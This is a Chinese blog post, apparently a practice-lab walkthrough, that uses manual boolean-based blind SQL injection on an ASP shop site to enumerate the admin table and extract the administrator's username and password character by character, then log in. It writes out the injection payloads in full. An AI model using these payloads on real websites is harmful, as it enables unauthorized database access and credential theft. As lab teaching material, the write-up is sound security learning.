shop靶机实践sql盲注获取后台管理员账号密码

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量3.7k 收藏 7
点赞数 1
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36706878/article/details/79573872
版权

shop靶机盲注获取后台管理员账号密码

 

找到注入点。

注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485

首先分析一下为什么确定这是一个注入点:

一、 正常页面如下:

二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485’页面报错

三、 在URL后加and1=1即http://192.168.244.131:60785/shop/productshopxp.asp?id=485and 1=1 页面无变化

四、 在URL后加and1=2即http://192.168.244.131:60785/shop/productshopxp.asp?id=485and 1=2页面报错

  由以上几点可以得知,我们提交的一些数据或者命令被数据库执行,可以确定这就是一个注入点。

获得后台数据库中存储网站用户和密码的数据表。

从这个提交的数据我们大概可以猜测该注入为数字型的注入  sql语句大致如下:

Select  * from 表名 where id = 数字

判断是否存在某个表我们用下面的语句

and exists(select count(*) from 表名)

如果存在,则页面无变化,如果不存在,则页面返回没有此id的商品

我们先测试下admin这个表是否存在

and exists(select count(*) from admin)

 

 

发现页面无变化,则存在该表,再测一下users这个表

 

发现报错,大致可以认为该后台数据库中存储网站用户和密码的数据表,

那我们再测一下这个表中是否存在users或者user或者admin 和password这两列是否存在

and exists(select count(password)from admin)

 

and exists(select count(users)from admin)

结果发现users和user这两列都不对

再试试admin

and exists(select count(admin)from admin)

发现admin这一列存在,则可以确定如下:

存储账号和密码的表为admin

逐位猜解出用户名和密码(只需写出猜解前两位的过程)。

猜解用户名和密码时,我们需要一位一位的猜解,首先是要获取某一行的用户名和密码的长度,用法如下:

and (select top 1 len(admin) fromadmin)>一个数字

这里用二分法确定其长度和每一位字段的ascll值,

and (select top 1 len(admin) fromadmin)>7

发现报错

and (select top 1 len(admin) fromadmin)>4

页面正常

and (select top 1 len(admin) fromadmin)>5

页面报错,则admin表中用户名这一列第一行用户名长度为5

下面开始猜解每一位的ascll值

and (select top 1 asc(mid(admin,1,1))from admin)>97

这里top 1代表第一行   (admin,1,1)中第一个1为第一位,第二个1代表偏移几位,

页面报错

 

and (select top 1 asc(mid(admin,1,1))from admin)>50

页面正常

通过这样的方式确定admin第一行第一个字母ascll值为97 对照一下得a

下面猜测第二位

and (select top 1 asc(mid(admin,2,1))from admin)>99

 

 

页面正常

 

and (select top 1 asc(mid(admin,2,1))from admin)>100

 

页面报错 则第二位ascll值为100  是d

循环这样的方式最后得admin第一行为admin,password为MD5加密后的密码  解密后为admin

用获得的用户名和密码验证是否能登陆。

找到管理页面,

http://192.168.244.131:60785/shop/admin/login.asp

 

 

管理登录成功!

 

过客璇璇
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透第一个靶机 shop1.0 (还是简单渗透版)
yangtailang94666的博客
09-27 2045
环境:win7虚拟机 渗透工具 : burpsuite 和菜刀 shop 1.0 通过一些后台字典,简简单单找到了该网站的后台找到。 下一步,进入以管理员身份渗透进入该系统,,使用burpsuit进行暴力破解,或者使用sql入, 此处使用sql入来解决。 算了 此处多写一点。 解决一下找后台问题。有些后台会进行隐藏,并不是简单的/admin /logind等 而且网站开发语言也不一样,可能是php也可能是asp 就所以后缀就很复杂,所以就需要使用一些后台扫描工具...
Web应用手工渗透测试——用SQLMap进行SQL测试
02-26
本文将更进一步,讨论SQL,如果读者没有任何相关知识储备,建议先去wikipedia学习一下。在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先册一个...
靶机实战-peixun-sever
滕财然的博客
01-25 340
peixun-sever靶机实战 文章目录peixun-sever靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务(80端口)5、提权 1、主机发现 目标IP:192.168.232.135 2、端口扫描 开放22、80、8080端口 3、端口详细信息扫描 4、访问http服务(80端口) 熟悉的id=…试试有没有SQL入 说明存在SQL入,尝试SQL入:...
sql入(
最新发布
2302_79119987的博客
04-23 1582
时间又称延迟入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。入语句与布尔相似,但是过程太繁琐一般使用自动化入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
sql 各种方法拿到 管理员账户和密码
qq_41860876的博客
11-08 1491
任务092:手动漏洞挖掘-SQL笔记 介绍 web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在 下面就是没有过滤好发现了他存在sql漏洞 sql就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql入这个就叫sql了 看一下返回就结果没有显示任何东西 ...
使用python脚本的时间完整步骤
wutiangui的博客
09-30 492
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
Python自动化sql入:布尔_布尔脚本
2401_83739411的博客
04-07 829
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
E063-web安全应用-SQL初级.pdf
12-02
SQLSQL Blind Injection)是一种针对Web应用程序的安全漏洞利用方法,它发生在Web应用程序对用户输入的数据没有进行有效的验证和过滤时。在这种情况下,攻击者可以通过构造特定的查询字符串,尝试猜测数据库的...
sqli-labs-master.zip sql入的学习靶机
01-18
sql入的学习靶机,由于github经常挂,这里特提供大家下载。
网络安全-实验七-SQL入-+sqlmap使用.docx
11-10
【网络安全-实验七-SQL入-+sqlmap使用】 SQL入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL入的类型,并...
sql入靶场.zip
06-24
这个"sql入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
如何通过破解hash来获取管理员密码
12-28
如何通过破解hash来获取管理员密码. 高手勿进。
SQL入之如何检测与判断详细过程
01-31
SQL入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前入点满大街,一个单引号就可以判断出是否存在入点。但是如今随着各大厂商越来越重安全,各种过滤,各种waf,将入隐藏的越来越深。那么作为白帽子,该如何判断是否存在入! 这里附上我挖bat各大厂商时用的判断入方法。下一期再分享如何过waf。
SQL入漏洞:CMS布尔python脚本编写
一个努力学习网安的小牛马
11-07 197
【代码】SQL入漏洞:CMS布尔python脚本编写。
ACCESS获取网站的管理员账户密码
weixin_48170459的博客
12-05 1959
我们将通过一个网站来熟悉ACCESS 靶机: win2003 我们先在网站的各个地方寻找入点,发现在id的位置存在一个入点 接着判断是字符型入还是数值型入,发现是数值型入 1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1 2.数值型测试:id=2 and 1=1 接着进行错误入判断 id=2 and 1=0 判断是否为ACCESS数据库 id=2 and exists(select * from sysobjects) id=2 and exists(
靶机网站实现简单SQL
真正的大师,永远都怀着一颗学徒的心。
07-15 1754
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、sql入是什么?二、入过程1.明确SQL入总体思路(1)寻找入点(2)判断后台数据库类型和服务器的类型(3)针对不同的数据库和服务器类型构建语句进行入2.进行站点分析(1)判断入-最经典的and 1=1(2)判断该表当前页面字段数(3)确定当前页面回显(4)在第三个字段处构建语句,获取库名,字段名,表名。(5)到此为止,我们已经可以通过表名和字段名查询到管理员账号密码了(6)进入后台看是否能够成功登陆。总结
【谨慎学习】手把手教你破解网站管理后台帐号密码
热门推荐
Javachichi的博客
12-28 1万+
PS: 如果有朋友仔细的跟着教程去做去完成并加以思考了之后,会发现在教程中我们还有一个敏感的信息源,那就是我们的网关(换句话说就是我们的路由器),这个设备管控这我们电脑上所有的数据流,一旦我们的网关被不法份子所控制,那我们所有的数据将被监听、一旦不法份子通过某种工具或某种手段还原了我们的数据,那后果将是不可估量的,所以大家在日常中还要对自己网络的出口网关加以防护,尽量通过去做好每一个细节而保证我的网络安全。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
SQL 入-
weixin_53711701的博客
01-30 1735
SQL 入-
SQL Injection (Blind)之(原理、分类、利用)
weixin_51513059的博客
03-24 3520
SQL入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,可分为两类:基于布尔的(Boolean based)基于时间的(Time based)
dvwa靶机sql
08-04
DVWA靶机中的SQL入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL入分为不同的安全级别,包括Low、Medium、High和Blind入。 在Low级别的SQL入中,攻击者可以通过在输入框中输入特定的SQL语句来绕过应用程序的验证,从而执行恶意操作。在Medium级别的SQL入中,应用程序对输入进行了一定的过滤,但仍存在一些漏洞可以被攻击者利用。在High级别的SQL入中,应用程序对输入进行了更严格的过滤,但仍然存在一些漏洞可以被攻击者利用。 在Blind入中,攻击者无法直接获取入结果,但可以通过构造特定的SQL语句来判断条件是否成立,从而获取敏感信息。Blind入可以分为不同的级别,包括Low、Medium和High级别。 为了进行SQL入攻击,攻击者可以使用手工方法或者工具如sqlmap。手工方法需要攻击者具备一定的SQL入知识和技巧,而工具如sqlmap可以自动化执行入攻击,提高攻击效率。 为了防御SQL入攻击,开发人员应该对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句来防止SQL入攻击。此外,还可以限制数据库用户的权限,避免敏感信息的泄露。 根据引用[3]中的结论,可以通过使用sqlmap工具来获取DVWA靶机中的数据库名和表名。具体的命令可以参考引用[3]中提供的示例。 总之,DVWA靶机中的SQL入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,获取未授权的访问权限或者敏感信息。开发人员应该采取相应的防御措施来保护应用程序的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值